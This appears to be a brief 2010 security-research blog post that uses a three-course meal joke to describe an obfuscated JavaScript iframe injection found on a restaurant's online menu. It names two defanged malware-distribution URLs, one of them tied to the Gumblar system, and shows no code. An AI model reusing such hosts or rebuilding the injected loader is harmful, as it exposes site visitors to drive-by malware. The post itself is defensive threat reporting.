Michal Krejdl

19 March 2010

Would you like an iframe, sir?

Yesterday, when I was about to get something to eat, my attempt to check a menu online ended up with a warning about HTML:Iframe-LZ. Well, that's quite spicy content of common daily offer. So, let's look what's under the hood.

Starter: a piece of JavaScript at the end of page - served in a nicely roasted layer of obfuscation, really delicious.

Main course: you can choose either a speciality of Chinese cuisine delivered by hxxp://b.nt002.cn/E/J.JS (it's fortunately down already) or a Russian saschlik that contains some popular ingredients (such as google, classmates or linkhelper) in following order - hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru: 8080/ocn.ne.jp/ocn.ne.jp/ classmates.com/linkhelper.cn/google.com/ (also down already, but these two links belong to a Gumblar system).

Dessert: a nice little snippet to carry the execution of all the malcode.

Anyone else hungry out there? :-)

Threat Research, Security News